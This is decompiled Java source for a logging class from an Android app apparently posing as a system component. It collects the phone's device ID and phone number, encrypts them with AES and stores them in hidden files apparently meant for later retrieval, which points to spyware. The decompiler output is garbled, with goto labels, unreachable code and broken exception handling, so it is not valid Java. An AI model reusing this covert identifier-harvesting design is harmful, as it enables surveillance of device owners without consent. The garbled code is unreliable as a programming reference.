// Decompiled by JEB v1.5.201408040 - http://www.android-decompiler.com

package com.android.logging;

import android.content.Context;
import com.android.packet.ByteArrayTempStream;
import com.android.packet.TCPCommunication;
import com.android.packet.TLVPacket;
import com.android.packet.TypeDefinitons;
import com.android.services.GlobalAPP;
import com.my.api.AESCipher;
import java.io.BufferedOutputStream;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.OutputStream;
import java.io.UnsupportedEncodingException;
import java.nio.ByteBuffer;
import java.nio.channels.FileChannel;
import java.security.InvalidAlgorithmParameterException;
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import java.text.SimpleDateFormat;
import java.util.ArrayList;
import java.util.Date;
import java.util.GregorianCalendar;
import java.util.Locale;
import javax.crypto.NoSuchPaddingException;

public class Logger implements ILogReader, ILogWriter {
    private GlobalAPP mApp;
    private Context mContext;
    private static Logger mInstance;
    private final int miMaxSize;
    private String msFileName;
    private final String msFileNameExtension;
    private final String msFileNamePrefix;
    private final String msLogTypeInfo;
    private final String msLogTypelError;
    private final String msLogTypelWarn;
    private final String sdcardPath;

    static {
        Logger.mInstance = null;
    }

    private Logger() {
        super();
        this.msFileNamePrefix = "60";
        this.msFileNameExtension = ".rd";
        this.msLogTypeInfo = "INFO";
        this.msLogTypelWarn = "WARN";
        this.msLogTypelError = "ERROR";
        this.miMaxSize = 524288;
        this.sdcardPath = "sdcard/Log";
        this.msFileName = null;
        this.mApp = GlobalAPP.getInstance();
        this.mContext = null;
        if(this.mApp != null) {
            this.mContext = this.mApp.getApplicationContext();
        }
    }

    protected TLVPacket buildMobileEncryption(TLVPacket contentPacket) throws UnsupportedOperationException {
        ByteArrayOutputStream v2 = new ByteArrayOutputStream();
        try {
            AESCipher v0 = AESCipher.getInstance(GlobalAPP.TjUIDasHexString.getBytes());
            ByteArrayTempStream v3 = new ByteArrayTempStream(contentPacket.getLengthInInt());
            TCPCommunication.write(v3, contentPacket);
            v0.encrypt(new ByteArrayInputStream(v3.toByteArray()), ((OutputStream)v2));
        }
        catch(IOException v4) {
        }
        catch(UnsupportedEncodingException v4_1) {
        }
        catch(InvalidAlgorithmParameterException v4_2) {
        }
        catch(NoSuchPaddingException v4_3) {
        }
        catch(NoSuchAlgorithmException v4_4) {
        }
        catch(InvalidKeyException v4_5) {
        }

        return this.buildTLVPacket("0xfe5b90", v2.toByteArray());
    }

    protected TLVPacket buildMobileLoggingMetaInfo() {
        ArrayList v18 = new ArrayList();
        v18.add(this.buildTLVPacket("0xfe5760", new Long(Long.parseLong(GlobalAPP.getInstance().getApplicationContext().getSystemService("phone").getDeviceId()))));
        v18.add(this.buildTLVPacket("0x846540", Integer.valueOf(GlobalAPP.TjUID)));
        v18.add(this.buildTLVPacket("0xfe5f70", GlobalAPP.PhoneNumber));
        Date v11 = new GregorianCalendar().getTime();
        SimpleDateFormat v13 = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
        SimpleDateFormat v14 = new SimpleDateFormat("z", new Locale("en", "US"));
        String v3 = v13.format(v11);
        v18.add(this.buildTLVPacket("0xfe3080", v14.format(v11)));
        v18.add(this.buildTLVPacket("0xfe3280", v3));
        return this.buildTLVPacket("0x6001a0", v18.toArray(new TLVPacket[v18.size()]));
    }

    protected TLVPacket buildTLVPacket(String type, Object content) {
        TLVPacket v0 = new TLVPacket();
        v0.setBody(content);
        v0.setHeader(TypeDefinitons.TLVPAYLOADTYPES.get(type).intValue());
        return v0;
    }

    private Boolean checkContext() {
        Boolean v0;
        if(this.mContext == null) {
            if(this.mApp == null) {
                this.mApp = GlobalAPP.getInstance();
            }

            if(this.mApp != null) {
                this.mContext = this.mApp.getApplicationContext();
            }

            if(this.mContext != null) {
                goto label_16;
            }

            v0 = Boolean.valueOf(false);
        }
        else {
        label_16:
            v0 = Boolean.valueOf(true);
        }

        return v0;
    }

    private void createNewLogFile() throws IOException {
        BufferedOutputStream v6;
        StringBuilder v7 = new StringBuilder();
        v7.append("60");
        v7.append(System.currentTimeMillis());
        v7.append(".rd");
        if(this.checkContext().booleanValue()) {
            File v2 = new File(this.mContext.getFilesDir(), v7.toString());
            TLVPacket v1 = this.buildMobileEncryption(this.buildMobileLoggingMetaInfo());
            ByteArrayTempStream v3 = new ByteArrayTempStream(v1.getLengthInInt());
            TCPCommunication.write(v3, v1);
            ByteBuffer v0 = ByteBuffer.allocate(v3.toByteArray().length);
            v0.put(v3.toByteArray());
            v0.flip();
            BufferedOutputStream v5 = null;
            try {
                v6 = new BufferedOutputStream(new FileOutputStream(v2, true));
            }
            catch(Throwable v8) {
                goto label_44;
            }

            try {
                ((OutputStream)v6).write(v0.array());
                ((OutputStream)v6).flush();
                if(v6 == null) {
                    goto label_40;
                }

                goto label_39;
            }
            catch(Throwable v8) {
                v5 = v6;
            }

        label_44:
            if(v5 != null) {
                ((OutputStream)v5).close();
            }

            throw v8;
        label_39:
            ((OutputStream)v6).close();
        label_40:
            this.msFileName = v7.toString();
        }
    }

    public String[] dataAvailable() {
        Object[] v3_1;
        String[] v3 = null;
        if((this.checkContext().booleanValue()) && this.mContext != null) {
            ArrayList v2 = new ArrayList();
            String[] v1 = this.mContext.getFilesDir().list();
            int v5 = v1.length;
            int v4;
            for(v4 = 0; v4 < v5; ++v4) {
                String v0 = v1[v4];
                if(v0.startsWith("60")) {
                    v2.add(v0);
                }
            }

            if(v2.size() == 0) {
                goto label_4;
            }

            v3_1 = v2.toArray();
        }

    label_4:
        return ((String[])v3_1);
    }

    public static Logger getInstance() {
        if(Logger.mInstance == null) {
            Logger.mInstance = new Logger();
        }

        return Logger.mInstance;
    }

    public Boolean isValidLogFile(String sFilename) {
        return Boolean.valueOf(sFilename.startsWith("60"));
    }

    public int log(String sMsg, LogType type) throws IOException {
        BufferedOutputStream v13;
        BufferedOutputStream v12;
        ByteBuffer v3;
        File v8;
        __monitor_enter(this);
        try {
            if(this.msFileName == null) {
                this.createNewLogFile();
            }

            if(this.msFileName == null) {
                goto label_85;
            }

            v8 = new File(this.mContext.getFilesDir(), this.msFileName.toString());
            if((v8.exists()) && v8.length() > 524288) {
                this.createNewLogFile();
                v8 = new File(this.mContext.getFilesDir(), this.msFileName.toString());
            }

            StringBuilder v14 = new StringBuilder();
            v14.append(new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new GregorianCalendar().getTime()));
            v14.append(",");
            v14.append(this.logTypeToString(type));
            v14.append(",");
            v14.append(sMsg);
            v14.append("\n");
            TLVPacket v6 = this.buildMobileEncryption(this.buildTLVPacket("0x600280", v14.toString()));
            ByteArrayTempStream v9 = new ByteArrayTempStream(v6.getLengthInInt());
            TCPCommunication.write(v9, v6);
            v3 = ByteBuffer.allocate(v9.toByteArray().length);
            v3.put(v9.toByteArray());
            v3.flip();
            v12 = null;
        }
        catch(Throwable v7) {
            goto label_93;
        }
        catch(Throwable v15) {
            goto label_96;
        }

        try {
            v13 = new BufferedOutputStream(new FileOutputStream(v8, true));
        }
        catch(Throwable v15) {
            goto label_89;
        }

        try {
            ((OutputStream)v13).write(v3.array());
            ((OutputStream)v13).flush();
            if(v13 == null) {
                goto label_85;
            }

            goto label_84;
        }
        catch(Throwable v15) {
            v12 = v13;
        }

    label_89:
        if(v12 != null) {
            try {
                ((OutputStream)v12).close();
            label_91:
                throw v15;
            label_84:
                ((OutputStream)v13).close();
                goto label_85;
            }
            catch(Throwable v15) {
            label_97:
                throw v15;
            }
            catch(Throwable v7) {
                try {
                label_93:
                    v7.printStackTrace();
                label_85:
                    __monitor_exit(this);
                    return 0;
                label_96:
                    __monitor_exit(this);
                    goto label_97;
                }
                catch(Throwable v15) {
                    goto label_96;
                }
            }
        }

        goto label_91;
    }

    public int logError(String sMsg) throws IOException {
        return this.log(sMsg, LogType.ERROR);
    }

    public int logInfo(String sMsg) throws IOException {
        return this.log(sMsg, LogType.INFO);
    }

    private String logTypeToString(LogType type) {
        String v0;
        switch(Logger.$SWITCH_TABLE$com$android$logging$ILogWriter$LogType()[type.ordinal()]) {
            case 1: {
                v0 = "INFO";
                break;
            }
            case 2: {
                v0 = "WARN";
                break;
            }
            case 3: {
                v0 = "ERROR";
                break;
            }
            default: {
                v0 = null;
                break;
            }
        }

        return v0;
    }

    public int logWarn(String sMsg) throws IOException {
        return this.log(sMsg, LogType.WARN);
    }

    private ByteBuffer readFileToBuffer(String sFilename) throws IOException {
        File v2 = new File(this.mContext.getFilesDir(), sFilename);
        FileChannel v1 = new FileInputStream(v2).getChannel();
        ByteBuffer v0 = ByteBuffer.allocate(((int)v2.length()));
        v1.read(v0);
        v1.close();
        v0.flip();
        return v0;
    }

    public ByteBuffer readToBuffer() throws IOException {
        return this.readToBuffer(this.msFileName);
    }

    public ByteBuffer readToBuffer(String sFilename) throws IOException {
        if(sFilename == null) {
            throw new FileNotFoundException();
        }

        if(!sFilename.startsWith("60")) {
            throw new FileNotFoundException();
        }

        __monitor_enter(this);
        try {
            ByteBuffer v0 = this.readFileToBuffer(sFilename);
            if(sFilename.equals(this.msFileName)) {
                this.msFileName = null;
            }

            this.notifyAll();
            __monitor_exit(this);
            return v0;
        label_21:
            __monitor_exit(this);
        }
        catch(Throwable v1) {
            goto label_21;
        }

        throw v1;
    }

    public int removeFile(String sFilename) throws IOException {
        int v1;
        if(sFilename == null) {
            throw new FileNotFoundException();
        }

        if(!sFilename.startsWith("60")) {
            throw new FileNotFoundException();
        }

        if(!this.checkContext().booleanValue()) {
            v1 = -2;
        }
        else {
            v1 = 0;
            __monitor_enter(this);
            try {
                if(!new File(this.mContext.getFilesDir(), sFilename).delete()) {
                    goto label_33;
                }
                else if(this.msFileName.equals(sFilename)) {
                    this.msFileName = null;
                }

                goto label_28;
            }
            catch(Throwable v2) {
                goto label_31;
            }

        label_33:
            v1 = -1;
            try {
            label_28:
                __monitor_exit(this);
                return v1;
            label_31:
                __monitor_exit(this);
            }
            catch(Throwable v2) {
                goto label_31;
            }

            throw v2;
        }

        return v1;
    }

    public int sdcardLog(String type, String sMsg) {
        BufferedOutputStream v7;
        File v5;
        __monitor_enter(this);
        try {
            File v9 = new File("sdcard/Log");
            v5 = new File(v9, "log.txt");
            if(v9.exists()) {
                goto label_13;
            }

            v9.mkdir();
            try {
                if(v5.exists()) {
                    goto label_13;
                }

                v5.createNewFile();
            }
            catch(IOException v3) {
                try {
                    v3.printStackTrace();
                }
                catch(Throwable v10) {
                    goto label_51;
                }
            }
        }
        catch(Throwable v10) {
            goto label_51;
        }

    label_13:
        BufferedOutputStream v6 = null;
        try {
            v7 = new BufferedOutputStream(new FileOutputStream(v5, true));
            goto label_19;
        }
        catch(Throwable v10) {
        }
        catch(IOException v3) {
            goto label_62;
            try {
            label_19:
                StringBuilder v8 = new StringBuilder();
                v8.append(new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new GregorianCalendar().getTime()));
                v8.append(",");
                v8.append(type);
                v8.append(",");
                v8.append(sMsg);
                v8.append("\n");
                v7.write(v8.toString().getBytes());
                v7.flush();
                if(v7 == null) {
                    goto label_44;
                }

                goto label_42;
            }
            catch(Throwable v10) {
            }
            catch(IOException v3) {
            }
            catch(FileNotFoundException v3_1) {
                v6 = v7;
                try {
                label_54:
                    v3_1.printStackTrace();
                    if(v6 == null) {
                        goto label_44;
                    }
                }
                catch(Throwable v10) {
                    goto label_70;
                }

                try {
                    v6.close();
                    goto label_44;
                }
                catch(Throwable v10) {
                }
                catch(IOException v3) {
                    try {
                        v3.printStackTrace();
                        goto label_44;
                    }
                    catch(Throwable v10) {
                        goto label_51;
                    }

                    v6 = v7;
                    try {
                    label_62:
                        v3.printStackTrace();
                        if(v6 == null) {
                            goto label_44;
                        }
                    }
                    catch(Throwable v10) {
                        goto label_70;
                    }

                    try {
                        v6.close();
                        goto label_44;
                    }
                    catch(Throwable v10) {
                    label_52:
                        throw v10;
                    }
                    catch(IOException v3) {
                        try {
                            v3.printStackTrace();
                            goto label_44;
                        }
                        catch(Throwable v10) {
                            goto label_51;
                        }

                        v6 = v7;
                    label_70:
                        if(v6 != null) {
                            try {
                                v6.close();
                            }
                            catch(IOException v3) {
                                v3.printStackTrace();
                            }
                        }

                        throw v10;
                        try {
                        label_42:
                            v7.close();
                        }
                        catch(IOException v3) {
                            try {
                                v3.printStackTrace();
                            }
                            catch(Throwable v10) {
                                goto label_51;
                            }
                        }

                        try {
                        label_44:
                            __monitor_exit(this);
                            return 0;
                        label_51:
                            __monitor_exit(this);
                            goto label_52;
                        }
                        catch(Throwable v10) {
                            goto label_51;
                        }
                    }
                }
            }
        }
        catch(FileNotFoundException v3_1) {
            goto label_54;
        }
    }
}

